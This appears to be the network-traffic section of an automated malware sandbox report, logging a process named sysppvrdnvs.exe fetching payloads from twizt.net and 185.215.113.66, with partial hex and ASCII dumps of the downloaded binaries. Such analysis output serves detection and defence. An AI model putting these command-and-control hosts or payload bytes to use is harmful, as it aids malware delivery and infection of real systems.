Oct 26, 2024 07:26:30.080884933 CEST	1236	IN	Data Raw: 24 18 89 44 24 08 8b 87 70 02 00 00 89 54 24 1c 8b 97 7c 02 00 00 8d 4c 24 08 51 89 44 24 18 8b 46 28 52 b9 02 00 00 00 8b d7 89 44 24 28 e8 57 f8 ff ff 83 c4 08 5f 5e 83 c4 1c c3 83 c6 14 56 ff 15 64 00 41 00 6a 04 8d 54 24 2c 52 b8 01 00 00 00 Data Ascii: $D$pT$\|L$QD$F(RD$(W_^VdAjT$,RhfD$4`h3PufL$>A`QA`_^U- AVW\|$jD$PGL$QT$ 3RPt$(t$ t$$L$;twSu*T$ RT$jD$ P
Oct 26, 2024 07:26:30.080944061 CEST	1236	IN	Data Raw: 00 00 00 02 00 00 89 96 28 02 00 00 ff 15 fc 00 41 00 83 c7 3c 57 ff 15 5c 00 41 00 e8 35 fe ff ff 8b c6 5e 5b 5f 5d c3 56 e8 a8 87 00 00 83 c4 04 33 f6 55 e8 2d 91 00 00 83 c4 04 8b c6 5e 5b 5f 5d c3 cc cc cc 56 8b 74 24 08 85 f6 74 3a 81 3e 69 Data Ascii: (A<W\A5^[_]V3U-^[_]Vt$t:>ilciu2tu)\|@P\AL$tx^^UQj%EjMUMAUBE]UQEM
Oct 26, 2024 07:26:30.080960035 CEST	1236	IN	Data Raw: 8b 11 52 e8 fa 82 00 00 83 c4 04 8b 45 08 c7 00 00 00 00 00 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 1c 8b 45 0c 25 ff ff 00 00 89 45 e4 8b 4d 0c c1 e9 10 81 e1 ff ff 00 00 89 4d ec 8b 55 10 81 e2 ff ff 00 00 89 55 fc 8b 45 10 c1 Data Ascii: RE]UE%EMMUUE%EMMUEEEMMMUUUE;EsEEMUMEEMUEM;UsEEMMUJEHM
Oct 26, 2024 07:26:30.080974102 CEST	1236	IN	Data Raw: eb 07 c7 45 fc 00 00 00 00 8b 4d f8 8b 55 08 8b 04 8a 8b 4d f8 8b 55 10 03 04 8a 8b 4d f8 8b 55 08 89 04 8a 8b 45 f8 8b 4d 08 8b 55 f8 8b 75 10 8b 04 81 3b 04 96 73 09 8b 4d fc 83 c1 01 89 4d fc eb 82 8b 45 fc 5e 8b e5 5d c3 cc cc cc 55 8b ec 83 Data Ascii: EMUMUMUEMUu;sMME^]UEEMMEUUE9EsMUEEEM;MUE<uMMUEEEEM;MU
Oct 26, 2024 07:26:30.080990076 CEST	784	IN	Data Raw: dc e9 4a fe ff ff 8b 4d fc 89 4d d0 eb 09 8b 55 d0 83 c2 01 89 55 d0 8b 45 cc 03 45 fc 39 45 d0 7d 0f 8b 4d d0 8b 55 e4 c7 04 8a 00 00 00 00 eb dd 8b 45 fc 50 8b 4d c8 51 8b 55 0c 52 8b 45 0c 50 e8 d4 06 00 00 83 c4 10 8b 4d fc 51 8b 55 c8 52 8b Data Ascii: JMMUUEE9E}MUEPMQUREPMQUREPMQ3]U}uEEEEEM;MUEQUREPMU+EMU+EMU9vEE
Oct 26, 2024 07:26:30.086544991 CEST	1236	IN	Data Raw: e0 89 45 f8 8b 4d fc d1 e1 89 4d fc 8b 55 fc 0b 55 d8 89 55 fc 8b 45 f8 03 45 e8 89 45 f8 8b 4d f8 3b 4d e8 73 14 8b 55 fc 83 c2 01 89 55 fc 75 09 8b 45 e0 83 c0 01 89 45 e0 8b 4d fc 03 4d ec 89 4d fc 8b 55 fc 3b 55 ec 73 09 8b 45 e0 83 c0 01 89 Data Ascii: EMMUUUEEEM;MsUUuEEMMMU;UsEEMMUEEMMUE;sMMuUUEE;Eu'}t!MMMU;UsEEEMMUEMMUUEEMUEE
Oct 26, 2024 07:26:34.647906065 CEST	176	OUT	GET /peinstall.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Host: twizt.net
Oct 26, 2024 07:26:35.032983065 CEST	184	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:26:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49795	185.215.113.66	80	7612	C:\Windows\sysppvrdnvs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:26:40.771573067 CEST	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:26:41.658898115 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:26:41 GMT Content-Type: application/octet-stream Content-Length: 110600 Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT Connection: keep-alive ETag: "66f3a94a-1b008" Accept-Ranges: bytes Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED] Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF\|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/\|"bWRoj(\|A,>?1;>"&;ucy[t`w #cdyysGx_ChI]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!nWG,6+uY9U4OP&?vKi>X7Dto=2f
Oct 26, 2024 07:26:41.658919096 CEST	112	IN	Data Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3 Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:
Oct 26, 2024 07:26:41.659034967 CEST	1236	IN	Data Raw: df 50 5e 7f 28 4b 33 04 b4 3a a9 20 79 58 ed e3 8d 4d 5e 67 51 44 02 be a3 81 02 86 c9 f0 14 35 97 13 d9 96 cd e0 8c 35 1e b0 21 48 c2 e1 c2 46 e2 3f 1f af 7d 27 2b bf d5 57 0d 78 72 8d 70 c8 38 de 55 5f 48 89 81 a8 19 d0 bc 93 4b 5c e0 ff b8 c2 Data Ascii: P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)\|Rai>&y+eu BUHj{y0mlU"3S+I)~5DX#o&n3_$by<DLy/9o-T&ge1c80G~q!&
Oct 26, 2024 07:26:41.659049034 CEST	212	IN	Data Raw: 0c 17 99 f2 dc 4c 43 4c 1b 74 a4 2e 3b 7f 13 7b 31 10 68 ce 33 5d c9 ef c7 81 17 80 74 c1 fc 96 e6 99 a0 cf 08 de f9 ef c7 af b3 99 89 2e b0 c0 b8 e1 91 45 69 65 c0 5c 3f 1f 96 c7 05 7c c3 36 20 3a d9 99 20 a3 04 33 c0 2b cd 06 60 f3 53 fd 82 9c Data Ascii: LCLt.;{1h3]t.Eie\?\|6 : 3+`Se0L#}tK1(ss\|@a$@bWEgU4LlLAq5;z#@M8id8[y7pZN$S<[
Oct 26, 2024 07:26:41.659071922 CEST	1236	IN	Data Raw: fd 09 89 5a 84 98 ec 92 38 14 38 9c dd f9 b0 cb 41 ff 0b 97 6c 35 72 36 dd 5e 39 43 6b 6f 2b 40 c0 62 a9 0a 14 6b cb 24 3e 40 7c 23 d8 7d 5f 93 86 58 6b f8 d5 ed 16 bc f4 89 0f c2 d0 be 65 11 94 e8 c5 09 54 92 6c db a5 cf ff b7 18 b7 7e c2 a5 87 Data Ascii: Z88Al5r6^9Cko+@bk$>@\|#}_XkeTl~Kyyx.d;XbbE7PF-Pedz}F M1VDg~y%E*KsE"9a<5!bM+P14%Wc=9(R$ti+U:YyMdlO8
Oct 26, 2024 07:26:41.659086943 CEST	1236	IN	Data Raw: b3 9a d4 43 6a e4 f2 75 97 0c 0b 1d f5 a2 e6 ca 87 f3 9f 2e 7f 2c f3 b9 08 6a 41 ba db af 20 e9 e2 b7 95 be 45 10 38 78 59 38 68 e6 91 4c ab 89 0a 4a 50 69 af 16 7c 4b 8c 1e ad b2 11 f5 6c d5 33 a8 b6 4b 4b 9b 3f e5 d7 4f 0d 8c cc 6e 56 26 e2 b9 Data Ascii: Cju.,jA E8xY8hLJPi\|Kl3KK?OnV& KyL1d6Y0m~ ?LOR9.0Ddr(dL]VcX/N=kT,f\&Kk~DMub;/Gf%A&>thWZq.%?!
Oct 26, 2024 07:26:41.659101009 CEST	424	IN	Data Raw: 4c 20 e9 d8 14 6c 98 e5 aa f1 7e e9 1b b0 93 c9 de b9 46 ee a5 73 e6 65 44 70 3f a1 58 37 a8 99 36 bc 4a 9e f8 99 c0 07 b3 5e 5c 3d 6f 6e c5 cc aa 6b a5 3d fb cc e7 a4 0a a5 a4 c2 ff c3 c7 a3 5c f3 df 14 48 6d 79 fa 1a 18 c2 ef 59 b9 63 dc 45 fe Data Ascii: L l~FseDp?X76J^\=onk=\HmyYcEJI4B15't=ec*jt'48]~HD{nVS('ME{,` '3)t#Av@:VtVBD8^e`,id
Oct 26, 2024 07:26:41.659116983 CEST	1236	IN	Data Raw: 3b db 1b 09 a7 f3 8e e2 ce b4 1b 33 6f 72 fc 2b 5b d9 d1 1c 84 d5 79 c4 3c bf 5f 89 e7 25 51 c5 28 d5 cb f3 67 02 55 08 62 bc 37 88 f5 a6 44 90 5d bb 25 c3 94 47 b5 e9 e9 89 42 df 60 89 f8 ee 38 44 de 3b 59 67 68 26 9c 78 74 1d 4e bf f1 be ea 9f Data Ascii: ;3or+[y<_%Q(gUb7D]%GB`8D;Ygh&xtN%.IH2-d\kCdMt_71RW3vLnp7f+Iw6qPRvW*fKA+SjAn3'>N.KD"A#1a"!(?$\|%=e`
Oct 26, 2024 07:26:41.659130096 CEST	212	IN	Data Raw: b1 7f 0f d4 b3 41 c2 82 26 12 80 5c de 08 bd c4 19 9e 4e 18 74 03 ea 99 59 4a 16 86 40 78 ea 1b 10 69 f6 7d 91 53 c3 cd 9b 8b cb 36 f4 a5 73 d7 81 ab 40 0c b5 0a 25 a6 99 65 cd fe a6 99 a6 20 08 9c 69 97 96 13 98 0d 05 fe 24 2b 9b c2 ff 27 07 e7 Data Ascii: A&\NtYJ@xi}S6s@%e i$+'JccC{d,;HGj("IMHM;"C*@=jus%TO qU\`kqz(d];N_v
Oct 26, 2024 07:26:41.659145117 CEST	948	IN	Data Raw: b1 33 43 be 4d d4 95 88 f6 3c e7 6b bd a1 ab e2 eb 23 dc ee 48 8e a3 9e 89 a2 8e 64 2d cb 04 01 d5 5f 71 c9 ac d6 e9 02 85 ef 6f be 4d f5 03 ed 99 b8 a4 78 2d cd 55 8c fe be bb 79 60 72 ee 28 34 fb 23 a1 f4 81 8e 66 a0 90 7c 97 cb 86 a7 7c 5a ff Data Ascii: 3CM<k#Hd-_qoMx-Uy`r(4#f\|\|ZL!eyhK?7IXih2%E+hJ ?O7OHaYKyL.$LDx=>.gAiwVjFp7s ;emO+"/;
Oct 26, 2024 07:26:41.664514065 CEST	1236	IN	Data Raw: d4 d9 78 d6 71 22 12 a0 26 ee 4c 98 92 fa 8b f7 60 62 d2 48 5b 9c 20 f3 ab a1 00 23 51 da cb 45 93 a3 0b c0 aa 32 dc 5d 20 9b af 53 0c de 0c 96 80 4e 52 82 a5 e3 34 73 ce 83 78 32 e8 77 f0 e5 9c fd 79 ba 01 1c c6 1c a8 8a 48 71 44 46 41 ed c4 2f Data Ascii: xq"&L`bH[ #QE2] SNR4sx2wyHqDFA/ga:{X>O!{\o9P-\ g(y1EGK9/pvAyNbgZF'%V[X$x7Z'Owa5hhyX&1/v.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49810	185.215.113.66	80	7612	C:\Windows\sysppvrdnvs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:26:42.674529076 CEST	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:26:43.624396086 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:26:43 GMT Content-Type: application/octet-stream Content-Length: 110600 Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT Connection: keep-alive ETag: "66f3a94a-1b008" Accept-Ranges: bytes Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED] Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF\|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/\|"bWRoj(\|A,>?1;>"&;ucy[t`w #cdyysGx_ChI]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!nWG,6+uY9U4OP&?vKi>X7Dto=2f
Oct 26, 2024 07:26:43.624443054 CEST	1236	IN	Data Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3 Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)\|Rai>&y+eu B
Oct 26, 2024 07:26:43.624496937 CEST	424	IN	Data Raw: 92 02 a6 af d3 8a 44 33 dc 7e c6 0b 87 b7 17 5b 32 9e d8 e3 7e 89 ae fe 0d ce 3b 86 4f 41 86 56 53 cf 5c d1 6d b9 e7 ab 2b 74 96 68 fa 98 de de 1d 87 40 33 cd 44 42 72 de c3 3e 36 e6 f9 aa 06 79 c6 c8 0c 64 26 c0 a8 10 55 43 92 4b 87 97 c4 af 18 Data Ascii: D3~[2~;OAVS\m+th@3DBr>6yd&UCK$D8$O#5LCLt.;{1h3]t.Eie\?\|6 : 3+`Se0L#}tK1(*ss\|@a$@bWEgU4
Oct 26, 2024 07:26:43.624515057 CEST	1236	IN	Data Raw: a9 62 14 62 45 90 e4 ca 37 0a d6 50 46 2d 89 f8 d1 50 9d 90 65 c0 c2 9d e7 64 d1 7a dd 7d bb f2 80 f1 9a 46 20 de aa 80 4d 31 ce d7 56 b1 44 e3 67 16 7e 0a de 79 fc 25 45 18 0b 18 2a 9f c2 c0 e1 da 4b b2 f2 83 73 ab 45 22 ed 80 39 ef 9e f7 61 3c Data Ascii: bbE7PF-Pedz}F M1VDg~y%E*KsE"9a<5!bM+P14%Wc=9(R$ti+U:YyMdlO8GskX-`${#q>)$x~(FKi~p5-dvNmq\|7cm65w-iaNc5
Oct 26, 2024 07:26:43.624541044 CEST	1236	IN	Data Raw: 88 ad aa 95 30 6d b0 7e 20 3f 4c 4f 0e 99 b0 52 f7 39 2e cc a6 30 18 05 be 19 11 b9 44 64 00 72 e6 ab 28 a2 a6 a2 94 18 64 c9 84 4c 5d b9 c9 c6 56 a2 63 58 2f f8 c3 4e 3d 6b 96 14 54 91 a5 d6 2c 66 5c 7f fc 09 86 26 4b 6b 87 a1 7e db 8c 1b 06 0c Data Ascii: 0m~ ?LOR9.0Ddr(dL]VcX/N=kT,f\&Kk~DMub;/Gf%A&>thWZq.%?!Us. \|v43@^k#fk1'&b~iV@\|,,@\|Pc('"NT3U?A}?
Oct 26, 2024 07:26:43.624560118 CEST	1236	IN	Data Raw: ef b3 0c fb c8 d1 aa d1 42 d1 31 ca bf e0 16 da 81 f6 84 35 27 d6 ef 74 9a 3d 1a cb 65 63 99 e9 ec 2a ec 6a 74 27 b6 34 e7 e0 38 9c 1f bd 84 c7 dd 5d 7e e8 48 a4 d8 f8 44 7b 6e a3 ed a1 ad 86 a6 86 56 bb 53 ac a1 28 d7 bd 27 4d a3 8f fc 96 cd 1b Data Ascii: B15't=ec*jt'48]~HD{nVS('ME{,` '3)t#Av@:VtVBD8^e`,idHd8H0"_]>4]23BIZ?[LxIX~$"dT~4PDKy\MI8k
Oct 26, 2024 07:26:43.624577045 CEST	1236	IN	Data Raw: 82 9c ff dd 20 10 22 ac 69 51 be 90 8c 88 0e 60 91 bf ab 6a 4c 72 e8 db d7 7a 67 28 d6 c6 01 2c 3d 2d 4c 98 3c d5 c2 bb 7a 20 67 e8 b5 c8 62 12 bb 0d be 5d 6b 63 d5 b8 d9 cf 76 b6 d5 53 0e c0 5d f2 84 03 26 79 78 c2 d4 60 35 9c 49 80 8e d5 5d c1 Data Ascii: "iQ`jLrzg(,=-L<z gb]kcvS]&yx`5I]\|\U9\|U2}!#m<R122doz:=J-VmM[':50oNn_:Os}^~sH.Idu#}HRz"EnyT/V\3
Oct 26, 2024 07:26:43.624593019 CEST	248	IN	Data Raw: 28 52 3c 8e 18 2a 6e e9 84 03 d3 30 03 67 25 d2 db da c7 c3 b5 15 68 a6 14 cd 56 60 47 0b 9a 54 1a 8c ee bf a8 31 cd bb 22 dc be 9b 16 2f b5 03 00 e1 8f b6 86 97 ba d9 a6 60 2f 5a 56 98 9b c4 8e 78 0c e0 4f f2 ab 29 c8 b6 f6 ec e4 57 74 e1 42 50 Data Ascii: (R<*n0g%hV`GT1"/`/ZVxO)WtBPv/Hk&/'`gM<Zs3UB`>-XY)#4&~[Yzhvy,@xWY>/ !P(I,SkM79q(4jO
Oct 26, 2024 07:26:43.624608994 CEST	1236	IN	Data Raw: d4 d9 78 d6 71 22 12 a0 26 ee 4c 98 92 fa 8b f7 60 62 d2 48 5b 9c 20 f3 ab a1 00 23 51 da cb 45 93 a3 0b c0 aa 32 dc 5d 20 9b af 53 0c de 0c 96 80 4e 52 82 a5 e3 34 73 ce 83 78 32 e8 77 f0 e5 9c fd 79 ba 01 1c c6 1c a8 8a 48 71 44 46 41 ed c4 2f Data Ascii: xq"&L`bH[ #QE2] SNR4sx2wyHqDFA/ga:{X>O!{\o9P-\ g(y1EGK9/pvAyNbgZF'%V[X$x7Z'Owa5hhyX&1/v.
Oct 26, 2024 07:26:43.624627113 CEST	1236	IN	Data Raw: 6b d8 19 b5 11 e3 cf 43 42 f3 d5 ce 94 74 d1 d3 7c c4 63 16 3f ed 3b 70 02 93 a7 7e cd b0 b8 dd ec 38 97 ef e3 7f e0 95 e6 c2 d1 10 46 bd 45 ad 21 31 a1 0f 83 2a 92 bc eb 76 df f7 99 a5 73 af bf 37 86 2e a1 30 64 13 75 3d 10 72 f2 99 87 46 57 75 Data Ascii: kCBt\|c?;p~8FE!1vs7.0du=rFWu&uLD,6\|< b&zhH}bt^%/m=ES/noaYQj% b/',P@zB%7O]N0}YZ2:H%>%i)uELv;\|o\|
Oct 26, 2024 07:26:43.630068064 CEST	1236	IN	Data Raw: 02 1f 61 f6 2e 95 3a d9 d7 45 bd b2 a5 43 1a 63 62 a4 ef 8d 50 b8 c6 19 72 5c 1b 7d 7a fc 10 39 54 eb 7d 2e f3 27 93 8f 41 ce dd eb 1c f9 bf bf 80 40 26 db 1c 7a 0b 7b 03 ca d6 4d 91 b1 54 fe 99 c7 a6 47 66 9f f9 43 99 ea 79 8b 95 8d 69 07 87 04 Data Ascii: a.:ECcbPr\}z9T}.'A@&z{MTGfCyi&)sR0WjC0h3;_L';/HnL +<@$5y}:*kzM#mLUbqu8h;! u=voy.Y=;"v5!=VSa]+384
Oct 26, 2024 07:26:50.497570992 CEST	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:26:50.871736050 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:26:50 GMT Content-Type: application/octet-stream Content-Length: 8960 Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT Connection: keep-alive ETag: "671230ee-2300" Accept-Ranges: bytes Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED] Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI\|<iq#O@5U\|{`)]Hx-dR~A}"2 +(Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi\|/>y4m3hO;<\|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUYmj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f\|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49857	185.215.113.66	80	7612	C:\Windows\sysppvrdnvs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:26:51.956298113 CEST	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:26:52.901173115 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:26:52 GMT Content-Type: application/octet-stream Content-Length: 8960 Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT Connection: keep-alive ETag: "671230ee-2300" Accept-Ranges: bytes Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED] Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI\|<iq#O@5U\|{`)]Hx-dR~A}"2 +(Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi\|/>y4m3hO;<\|5,0tA`JNn;wesqT_:<fb7JH3& 